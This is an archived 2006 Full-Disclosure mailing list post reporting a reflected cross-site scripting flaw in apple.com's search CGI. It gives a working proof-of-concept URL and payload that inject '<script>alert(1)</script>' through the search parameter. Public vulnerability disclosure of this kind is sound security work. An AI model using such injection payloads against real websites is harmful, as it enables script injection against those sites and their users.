[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Re: apple.com xss

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Re: apple.com xss
From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
Date: Fri, 11 Aug 2006 14:00:18 +0200

http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl?q=-->+mac+<script>alert(1)</script>&output=xml_no_dtd&client=default_frontend&site=us_only&lr=lang_en&sort=&start=&access=p&oe=utf-8

On 11/08/06, Thomas Pollet <thomas.pollet@xxxxxxxxx> wrote:


apple.com search form xss ( POST var )
--> mac <script>alert(1)</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] apple.com xss
  - From: Thomas Pollet

Prev by Date: [Full-disclosure] apple.com xss
Next by Date: Re: [Full-disclosure] BlackBerry Vulnerabilities
Previous by thread: [Full-disclosure] apple.com xss
Next by thread: [Full-disclosure] New Laptop Polices
Index(es):
- Date
- Thread